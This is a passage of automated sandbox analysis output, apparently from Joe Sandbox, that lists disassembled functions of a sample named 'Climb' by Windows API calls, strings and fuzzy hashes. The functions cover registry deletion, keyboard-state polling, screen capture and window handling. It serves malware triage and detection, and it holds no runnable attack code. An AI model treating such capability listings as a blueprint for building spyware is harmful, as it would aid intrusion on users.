Opcode Fuzzy Hash: 385f679a8ff031836963a2a2226596dbac1f67be6ec1181ff84e766400f36b3e
Instruction Fuzzy Hash: 60518FB150060CBFD7219F61C988ABBBBBDFF18348F00841AFA5586250D738D949AB74

Function 00518FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,005166D6,?,?), ref: 00518FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,005166D6,?,?,00000000,?), ref: 00518FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,005166D6,?,?,00000000,?), ref: 00519009
CloseHandle.KERNEL32(00000000,?,?,?,?,005166D6,?,?,00000000,?), ref: 00519016
GlobalLock.KERNEL32(00000000), ref: 00519024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,005166D6,?,?,00000000,?), ref: 00519033
GlobalUnlock.KERNEL32(00000000), ref: 0051903C
CloseHandle.KERNEL32(00000000,?,?,?,?,005166D6,?,?,00000000,?), ref: 00519043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,005166D6,?,?,00000000,?), ref: 00519054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00520C04,?), ref: 0051906D
GlobalFree.KERNEL32(00000000), ref: 0051907D
GetObjectW.GDI32(00000000,00000018,?), ref: 0051909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 005190CD
DeleteObject.GDI32(00000000), ref: 005190F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0051910B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 52b362bae60ecbb834dfc8d5cd6bd6c2cac30ae4ee61eb79f936ec4d023d90b7
Instruction ID: fce3b7c9e189e47b638af6251554a758afe16b201a5a7510b722fcbdde3addee
Opcode Fuzzy Hash: 52b362bae60ecbb834dfc8d5cd6bd6c2cac30ae4ee61eb79f936ec4d023d90b7
Instruction Fuzzy Hash: 25413675600208BFDB119F65DC88EAABBB8FF99710F108458F915D7260D7709A85DB20

Function 0050C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

Part of subcall function 0050D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050C10E,?,?), ref: 0050D415
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D451
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4C8
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0050C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 0050C26A
RegCloseKey.ADVAPI32(?), ref: 0050C2DE
RegCloseKey.ADVAPI32(?), ref: 0050C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0050C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0050C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 0050C382
FreeLibrary.KERNEL32(00000000), ref: 0050C3E3
RegCloseKey.ADVAPI32(00000000), ref: 0050C3F4

Strings

advapi32.dll, xrefs: 0050C34D
RegDeleteKeyExW, xrefs: 0050C35E

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 6297e24e77bbf94cb39cc8be4ff7c319277a0af6e789da0217b345a0528d655e
Instruction ID: 5393eb71b888c07ac4aa723b57f0c0d670e52b7b7313b9ae0e7cc8a0d8405379
Opcode Fuzzy Hash: 6297e24e77bbf94cb39cc8be4ff7c319277a0af6e789da0217b345a0528d655e
Instruction Fuzzy Hash: 90C17B34204201AFD710DF15C495F6EBFE1BF85308F54899DE49A8B2A2CB35ED46CB91

Function 0051A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

GetSystemMetrics.USER32(0000000F), ref: 0051A990
GetSystemMetrics.USER32(00000011), ref: 0051A9A7
GetSystemMetrics.USER32(00000004), ref: 0051A9B3
GetSystemMetrics.USER32(0000000F), ref: 0051A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0051AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0051AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0051AC54
ShowWindow.USER32(00000003,00000000), ref: 0051AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 0051AC95
DefDlgProcW.USER32(?,00000005,?), ref: 0051ACBB

Strings

(U, xrefs: 0051A95B
@, xrefs: 0051ABD0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @$(U
API String ID: 3962739598-555058551
Opcode ID: 219a03e2987c9d9fea1b5f42976aaa7a9990f3b764e6f8e34581d08c017ed8a9
Instruction ID: b618c015cae0856cc28f11cd9fd22a2ebb5078be1fc661b3c5266f2fc0fdfc43
Opcode Fuzzy Hash: 219a03e2987c9d9fea1b5f42976aaa7a9990f3b764e6f8e34581d08c017ed8a9
Instruction Fuzzy Hash: 90B18830601219DFEF16CF68C984BEE7BF2BF44704F188069ED459A295D774AD84CBA1

Function 0051976A Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0048249F: GetWindowLongW.USER32(00000000,000000EB), ref: 004824B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 005197B6
GetFocus.USER32 ref: 005197C6
GetDlgCtrlID.USER32(00000000), ref: 005197D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00519879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0051992B
GetMenuItemCount.USER32(?), ref: 00519948
GetMenuItemID.USER32(?,00000000), ref: 00519958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0051998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 005199CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 005199FD

Strings

(U, xrefs: 00519779
0, xrefs: 005198FB

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0$(U
API String ID: 1026556194-3447543132
Opcode ID: 0d90692581dfe394ed6dd5d5a4ca764698b1bfb9c3c330c75650e29083691d77
Instruction ID: d80e2c2efeb1d38503e33e3bb6c073737455321c79cfcff3b1f188f4285e87e9
Opcode Fuzzy Hash: 0d90692581dfe394ed6dd5d5a4ca764698b1bfb9c3c330c75650e29083691d77
Instruction Fuzzy Hash: 3681CC71504301AFE710DF25C894AEB7BE8FF99314F04491EF985A7291DB30D989CBA2

Function 00502FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00503035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00503045
CreateCompatibleDC.GDI32(?), ref: 00503051
SelectObject.GDI32(00000000,?), ref: 0050305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 005030CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00503109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0050312D
SelectObject.GDI32(?,?), ref: 00503135
DeleteObject.GDI32(?), ref: 0050313E
DeleteDC.GDI32(?), ref: 00503145
ReleaseDC.USER32(00000000,?), ref: 00503150

Strings

(, xrefs: 005030EA

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: cb6be9a13d2cbe5ea04a06b6235be241e73385acd5c8fc98b2a89958a3b0adca
Instruction ID: 731d8162c99fa5dfcd649aaa8d16a0d770ac8aeeff9e08337ff915ae25643fa0
Opcode Fuzzy Hash: cb6be9a13d2cbe5ea04a06b6235be241e73385acd5c8fc98b2a89958a3b0adca
Instruction Fuzzy Hash: 7861E375D00219EFCF04CFA4D888EAEBBBAFF58310F208519E555A7250D775AA41DFA0

Function 004E52AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 004E52E6
GetWindowTextW.USER32(?,?,00000400), ref: 004E5328
_wcslen.LIBCMT ref: 004E5339
CharUpperBuffW.USER32(?,00000000), ref: 004E5345
_wcsstr.LIBVCRUNTIME ref: 004E537A
GetClassNameW.USER32(00000018,?,00000400), ref: 004E53B2
GetWindowTextW.USER32(?,?,00000400), ref: 004E53EB
GetClassNameW.USER32(00000018,?,00000400), ref: 004E5445
GetClassNameW.USER32(?,?,00000400), ref: 004E5477
GetWindowRect.USER32(?,?), ref: 004E54EF

Strings

ThumbnailClass, xrefs: 004E53BD, 004E5450

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 290841402b7c0e49e50a5b8e631df47e9c4dd8ec62d87273e5a4e1b2d3aed62f
Instruction ID: 14572e5091afb9dc9ddf1e3f62d9974c5d6784774c2a6b8bd08e51ea81c8caba
Opcode Fuzzy Hash: 290841402b7c0e49e50a5b8e631df47e9c4dd8ec62d87273e5a4e1b2d3aed62f
Instruction Fuzzy Hash: E5912571104B46BFD708DF26C984BAAB7B9FF10309F00451EFA8682291EB39ED55CB95

Function 004EC8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(005529C0,000000FF,00000000,00000030), ref: 004EC973
SetMenuItemInfoW.USER32(005529C0,00000004,00000000,00000030), ref: 004EC9A8
Sleep.KERNEL32(000001F4), ref: 004EC9BA
GetMenuItemCount.USER32(?), ref: 004ECA00
GetMenuItemID.USER32(?,00000000), ref: 004ECA1D
GetMenuItemID.USER32(?,-00000001), ref: 004ECA49
GetMenuItemID.USER32(?,?), ref: 004ECA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004ECAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004ECAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004ECB0C

Strings

0, xrefs: 004EC904

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 2bcd008b6664462d21e1da1e64d0b9d73c110e7ed4fe1ec1416adf4eee65b45d
Instruction ID: dada085565e2d020d40b1f12f42560db56a492487766a5559a05d05ad4ae85d4
Opcode Fuzzy Hash: 2bcd008b6664462d21e1da1e64d0b9d73c110e7ed4fe1ec1416adf4eee65b45d
Instruction Fuzzy Hash: 3861A270900289AFDF11CF6AD8C9AEF7BB9FB05349F04416AE811A3251D738AD06DB75

Function 004EE4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 004EE4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004EE4FA
_wcslen.LIBCMT ref: 004EE504
_wcsstr.LIBVCRUNTIME ref: 004EE554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 004EE570

Strings

\VarFileInfo\Translation, xrefs: 004EE568
DefaultLangCodepage, xrefs: 004EE5D3
04090000, xrefs: 004EE5A6
%u.%u.%u.%u, xrefs: 004EE64E
StringFileInfo\, xrefs: 004EE543

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: e7da36531217531dbf956b201f2c057ebc89f181a4feb6ff2e8886d30513ef5e
Instruction ID: 3b7ba9996554b18e77b295af390ff35852d396d6d222eac54f2e16e487c765c2
Opcode Fuzzy Hash: e7da36531217531dbf956b201f2c057ebc89f181a4feb6ff2e8886d30513ef5e
Instruction Fuzzy Hash: A841E5725002147AEB10AB768C46EFF7B7CEF66718F40041BF901A6182EB7D9A0197A9

Function 0050D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0050D6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0050D6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0050D7A8

Part of subcall function 0050D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0050D70A
Part of subcall function 0050D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0050D71D
Part of subcall function 0050D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0050D72F
Part of subcall function 0050D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0050D765
Part of subcall function 0050D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0050D788

RegDeleteKeyW.ADVAPI32(?,?), ref: 0050D753

Strings

advapi32.dll, xrefs: 0050D718
RegDeleteKeyExW, xrefs: 0050D729

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: c1648e3466c99f39b64a3d4fb46cd2f2012c42652b977ef1fdcbd3a8a9a3d1d3
Instruction ID: 938e784586110c882c70aa287e1490d41e7a58ad4f3f1fe808d33de66894ee38
Opcode Fuzzy Hash: c1648e3466c99f39b64a3d4fb46cd2f2012c42652b977ef1fdcbd3a8a9a3d1d3
Instruction Fuzzy Hash: 57316F71A41229BBDB219B90DC88EFFBF7CEF55750F004165B805E2180EB749E49EAB0

Function 004EEFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 004EEFCB

Part of subcall function 0049F215: timeGetTime.WINMM(?,?,004EEFEB), ref: 0049F219

Sleep.KERNEL32(0000000A), ref: 004EEFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 004EF01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004EF03E
SetActiveWindow.USER32 ref: 004EF05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004EF06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 004EF08A
Sleep.KERNEL32(000000FA), ref: 004EF095
IsWindow.USER32 ref: 004EF0A1
EndDialog.USER32(00000000), ref: 004EF0B2

Strings

BUTTON, xrefs: 004EF030

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: ac47388d6c62c0124771e5ee9601e391716534960e0d46775c4d904bc96e79f1
Instruction ID: 33338662d37f201aca0a497b09a5c92533d2976c6750a8cd42b9d09a1705095e
Opcode Fuzzy Hash: ac47388d6c62c0124771e5ee9601e391716534960e0d46775c4d904bc96e79f1
Instruction Fuzzy Hash: 9521A471200344BFE7106F62ECD9B667B79F76974BF00402AF50682272CB798D0CE625

Function 004EF313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004EF374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004EF38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004EF39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004EF3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004EF3BE

Strings

close PlayMe, xrefs: 004EF385, 004EF3B2
status PlayMe mode, xrefs: 004EF36F
play PlayMe wait, xrefs: 004EF3A8
alias PlayMe, xrefs: 004EF34D
open , xrefs: 004EF323
play PlayMe, xrefs: 004EF3B9

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 8148f05558ba5391ec711b7609ce3e8143be454663a46a16e502959213bf24c3
Instruction ID: 9a7640570beb87291c429dd811910abe6a25fe2ae87be6832ee6525862c88e0a
Opcode Fuzzy Hash: 8148f05558ba5391ec711b7609ce3e8143be454663a46a16e502959213bf24c3
Instruction Fuzzy Hash: 4511A331A501AD79D720B3678C4AEFF6E7CEBD5B48F40082B7801E20D1EBA45D09C6B5

Function 004EA958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 004EA9D9
SetKeyboardState.USER32(?), ref: 004EAA44
GetAsyncKeyState.USER32(000000A0), ref: 004EAA64
GetKeyState.USER32(000000A0), ref: 004EAA7B
GetAsyncKeyState.USER32(000000A1), ref: 004EAAAA
GetKeyState.USER32(000000A1), ref: 004EAABB
GetAsyncKeyState.USER32(00000011), ref: 004EAAE7
GetKeyState.USER32(00000011), ref: 004EAAF5
GetAsyncKeyState.USER32(00000012), ref: 004EAB1E
GetKeyState.USER32(00000012), ref: 004EAB2C
GetAsyncKeyState.USER32(0000005B), ref: 004EAB55
GetKeyState.USER32(0000005B), ref: 004EAB63

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: c1cbb9c244389f378de1a90221f7a53e030b28cea9c606c850954bcb00e91f4c
Instruction ID: b5507e4f370b26cdd43ca86f81fa8266f6c3aeb20c5b419b931fc19d90968d9d
Opcode Fuzzy Hash: c1cbb9c244389f378de1a90221f7a53e030b28cea9c606c850954bcb00e91f4c
Instruction Fuzzy Hash: AC51F7609047C429EB31D7A28950BEBBFB58F11385F08499FC5C2162C3DA58BB4CC7AB

Function 004E662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 004E6649
GetWindowRect.USER32(00000000,?), ref: 004E6662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 004E66C0
GetDlgItem.USER32(?,00000002), ref: 004E66D0
GetWindowRect.USER32(00000000,?), ref: 004E66E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 004E6736
GetDlgItem.USER32(?,000003E9), ref: 004E6744
GetWindowRect.USER32(00000000,?), ref: 004E6756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 004E6798
GetDlgItem.USER32(?,000003EA), ref: 004E67AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004E67C1
InvalidateRect.USER32(?,00000000,00000001), ref: 004E67CE

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 2dc0e423a3bd1776aa27a425ddbc777daf1f7cdc22889d89381adf0267c0deeb
Instruction ID: 0bb9e03634b93d69b083224b5f59b8f3be6be0734f7aeae8294c15068ff9ab52
Opcode Fuzzy Hash: 2dc0e423a3bd1776aa27a425ddbc777daf1f7cdc22889d89381adf0267c0deeb
